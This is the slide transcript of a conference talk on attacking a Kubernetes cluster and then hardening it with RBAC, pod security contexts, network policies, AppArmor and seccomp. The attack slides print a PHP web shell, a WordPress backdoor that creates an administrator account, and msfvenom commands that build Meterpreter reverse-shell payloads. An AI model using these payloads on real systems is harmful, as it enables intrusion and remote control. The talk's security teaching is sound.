Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Attacking a K8s cluster and how defending it
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Johann du Toit
October 31, 2019
Technology
0
64
Attacking a K8s cluster and how defending it
Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.
Johann du Toit
October 31, 2019
Tweet
Share
More Decks by Johann du Toit
See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
74
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
81
Progressive Web Apps in 15 Minutes
johanndutoit
0
44
The Machine Learning Intervention
johanndutoit
0
69
Progressive Web Apps
johanndutoit
0
96
Progressive Web Apps
johanndutoit
0
100
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
120
Google Design Sprints
johanndutoit
0
93
Cloud Messaging
johanndutoit
0
180
Other Decks in Technology
See All in Technology
システムのアラート調査をサポートするAI Agentの紹介/Introduction to an AI Agent for System Alert Investigation
taddy_919
2
1.5k
Meshy Proプラン課金した
henjin0
0
190
新規事業における「一部だけどコア」な AI精度改善の優先順位づけ
zerebom
0
500
Azure Durable Functions で作った NL2SQL Agent の精度向上に取り組んだ話/jat08
thara0402
0
130
Bill One 開発エンジニア 紹介資料
sansan33
PRO
4
17k
レガシー共有バッチ基盤への挑戦 - SREドリブンなリアーキテクチャリングの取り組み
tatsukoni
0
190
SREが向き合う大規模リアーキテクチャ 〜信頼性とアジリティの両立〜
zepprix
0
380
AIと新時代を切り拓く。これからのSREとメルカリIBISの挑戦
0gm
0
660
今日から始める Amazon Bedrock AgentCore
har1101
4
370
GitHub Issue Templates + Coding Agentで簡単みんなでIaC/Easy IaC for Everyone with GitHub Issue Templates + Coding Agent
aeonpeople
1
140
【インシデント入門】サイバー攻撃を受けた現場って何してるの?
shumei_ito
0
1.4k
生成AI時代にこそ求められるSRE / SRE for Gen AI era
ymotongpoo
5
2.4k
Featured
See All Featured
Taking LLMs out of the black box: A practical guide to human-in-the-loop distillation
inesmontani
PRO
3
2k
Jess Joyce - The Pitfalls of Following Frameworks
techseoconnect
PRO
1
62
A Tale of Four Properties
chriscoyier
162
24k
Optimizing for Happiness
mojombo
379
71k
Sam Torres - BigQuery for SEOs
techseoconnect
PRO
0
180
Fantastic passwords and where to find them - at NoRuKo
philnash
52
3.6k
Keith and Marios Guide to Fast Websites
keithpitt
413
23k
The Limits of Empathy - UXLibs8
cassininazir
1
210
Impact Scores and Hybrid Strategies: The future of link building
tamaranovitovic
0
200
エンジニアに許された特別な時間の終わり
watany
106
230k
Designing for humans not robots
tammielis
254
26k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
196
71k
Transcript
Bust a Kube: Let’s attack a Kubernetes cluster and secure
it along the way
None
None
None
None
None
None
WHAT ATTACKING DEFENDING
None
WHAT ATTACKING OMG HELP
None
None
None
PODS NODES SERVICES NAMESPACES
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume
Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim
e pod #1 pod #2 pod #3
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web
Namespaces Logical grouping of resources and the first hint of
multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
None
> kubectl apply -f app.yaml
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
None
None
<?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo
shell_exec($_REQUEST[“c”]);’ ); } ?>
None
None
<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')
{ require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
“Head over to your site and try the function. It’s
fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
None
None
None
None
None
None
None
Kali Linux
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f sh \ -o clickme.sh
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f elf \ -o clickme
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f exe \ -o clickme.exe
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f macho \ -o clickme.macho
None
None
None
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
CONTROL PLANE NETWORKING HOST RUNTIME
CONTROL PLANE NETWORKING HOST RUNTIME
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
None
None
None
None
None
None
UPGRADE!
None
Role Based Access Control
“RBAC”
None
Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 Step 1: Run as Non Root
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:
tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
None
None
None
CONTROL PLANE NETWORKING HOST RUNTIME
None
None
Minimal Host OS
None
AppArmor
seccomp
Questions?
• CIS Benchmark - CIS Security • Kube-bench - Aqua
Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec
Security is a not a noun you refer to every
now and then, it’s a verb and involves constant and specific action
Thanks!
[email protected]
@signedness
johanndutoit
taddy_919
henjin0
zerebom
thara0402
sansan33
tatsukoni
zepprix
0gm
har1101
aeonpeople
shumei_ito
ymotongpoo
inesmontani
techseoconnect
chriscoyier
mojombo
philnash
keithpitt
cassininazir
tamaranovitovic
watany
tammielis
soudai
![<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_29.jpg){kind=link}
![Thanks! [email protected] @signedness](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_84.jpg){kind=link}